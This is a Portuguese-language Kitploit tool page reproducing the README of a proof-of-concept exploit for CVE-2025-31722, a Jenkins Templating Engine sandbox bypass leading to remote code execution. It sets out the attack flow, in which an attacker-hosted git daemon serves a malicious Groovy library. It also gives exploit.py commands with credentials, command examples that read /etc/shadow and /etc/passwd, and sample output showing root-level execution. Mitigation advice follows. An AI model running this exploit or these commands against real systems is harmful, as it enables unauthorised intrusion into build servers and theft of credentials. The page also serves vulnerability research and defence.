Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-31722 — Exploit de prova de conceito para bypass de sandbox do plugin Jenkins Templating Engine (CVE-2025-31722) permitindo execução remota de código via injeção de biblioteca Groovy maliciosa. | Kitploit
Ferramentas/GitHubGitHub/h3raklez/cve-2025-31722
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubh3raklez/cve-2025-31722

CVE-2025-31722

Exploit de prova de conceito para bypass de sandbox do plugin Jenkins Templating Engine (CVE-2025-31722) permitindo execução remota de código via injeção de biblioteca Groovy maliciosa.

Ver Repositório
34há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-31722 — Jenkins Templating Engine RCE

Apenas para fins educacionais e de pesquisa de segurança autorizada.

Descrição

Vulnerabilidade de bypass de sandbox no plug-in Jenkins Templating Engine (JTE) <= 2.5.3 que permite que um usuário com baixos privilégios execute código arbitrário no servidor Jenkins.

A falha ocorre porque o JTE carrega bibliotecas de um repositório git externo definido em uma configuração GovernanceTier em nível de pasta e executa as etapas dessas bibliotecas fora da sandbox do Groovy, independentemente do nível de privilégio do usuário que criou o job.

CVSS: 8.8 (Alta)
Tipo: Bypass de Sandbox → RCE
Componente afetado: plug-in pipeline-templating-engine ≤ 2.5.3
Versão corrigida: 2.5.4+


Fluxo de Ataque

root@kitploit:~
Attacker (Kali)                          Jenkins Server
───────────────                          ──────────────
1. Creates git repo with evil.groovy
2. Starts git daemon on :9418
3. Creates folder in Jenkins        →    Folder with GovernanceTier
   pointing to git://KALI:9418/…         pointing to attacker's repo
4. Creates job with AdHoc template  →    Job calls evil()
5. Triggers build                   →    JTE clones repo from Kali
                                         Executes evil() outside sandbox
                                    ←    RCE as Jenkins user

Requisitos

Servidor Jenkins (alvo)

  • Jenkins com o plug-in Templating Engine 2.5.3 instalado
  • Plugins: cloudbees-folder, git, workflow-aggregator
  • CSRF desabilitado
  • Usuário attacker com permissões: Item/READ, Item/CREATE, Item/CONFIGURE, Item/BUILD
  • Nó Built-In online com pelo menos 1 executor
  • Conectividade de rede de saída do servidor para o IP do atacante na porta 9418

Máquina do atacante (Kali)

  • Python 3.8+
  • git instalado
  • Porta 9418 acessível a partir do servidor Jenkins
  • Biblioteca Python: requests
root@kitploit:~
pip install requests

Configuração do Laboratório

A configuração instalada em um servidor Debian/Ubuntu tinha Jenkins instalado, usuários configurados, permissões e plugins necessários. Ela não cria nenhum conteúdo malicioso — isso é tratado exclusivamente pelo PoC.


Uso

Exploração básica

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP>

Comando personalizado

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cmd "cat /etc/shadow"

Limpeza

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cleanup

Parâmetros

ParâmetroDescriçãoObrigatório
--urlURL base do JenkinsSim
--userUsuário com permissões Item/CREATE+CONFIGURE+BUILDSim
--passSenha do usuárioSim
--git-hostIP do Kali acessível a partir do JenkinsSim
--cmdComando a executar no servidor (padrão: id && hostname && cat /etc/passwd)Não
--cleanupExclui a pasta, o job e o repositório criados pelo exploitNão

Como o PoC Funciona

  1. setup_repo() — Cria ~/jte-exploit/evil-lib/steps/evil.groovy no Kali com o comando a executar
  2. start_git_daemon() — Inicia git daemon no Kali na porta 9418
  3. create_folder() — Cria uma pasta no Jenkins com um GovernanceTier apontando para git://KALI:9418/jte-exploit
  4. create_job() — Cria um job com AdHocTemplateFlowDefinition que declara evil-lib e chama evil()
  5. trigger_and_wait() — Dispara a construção e aguarda o resultado
  6. print_output() — Exibe a saída do console com o resultado do RCE

O daemon git permanece ativo durante todo o ciclo de construção e é encerrado automaticamente quando a construção é concluída.


Saída Esperada

root@kitploit:~
=================================================================
  CVE-2025-31722 — Jenkins Templating Engine RCE
  Target  : http://10.211.55.10:8080
  Git host: 10.211.55.7
  Command : id && hostname && cat /etc/passwd
=================================================================

[+] Authenticated as: attacker (id=attacker)
[+] Repo created: /root/jte-exploit
[+] Malicious step: evil-lib/steps/evil.groovy
[+] Git daemon running at git://10.211.55.7:9418/jte-exploit
[+] Folder created
[+] Job created
[+] Build queued

=================================================================
  CVE-2025-31722 — RCE OUTPUT
=================================================================
[JTE] ...
uid=0(root) gid=0(root) groups=0(root)
debian
root:x:0:0:root:/root:/bin/bash
...
=================================================================

Mitigação

  • Atualize o plug-in Templating Engine para a versão 2.5.4 ou posterior
  • Restrinja as permissões Item/CREATE e Item/CONFIGURE apenas a usuários confiáveis
  • Ative a proteção CSRF no Jenkins
  • Audite pastas com configurações GovernanceTier apontando para repositórios externos

Referências

  • Aviso de Segurança do Jenkins
  • GitHub do Plug-in JTE

Aviso legal: Este PoC destina-se exclusivamente a fins educacionais e testes em ambientes controlados. Usá-lo contra sistemas sem autorização explícita é ilegal.

Baixar ferramenta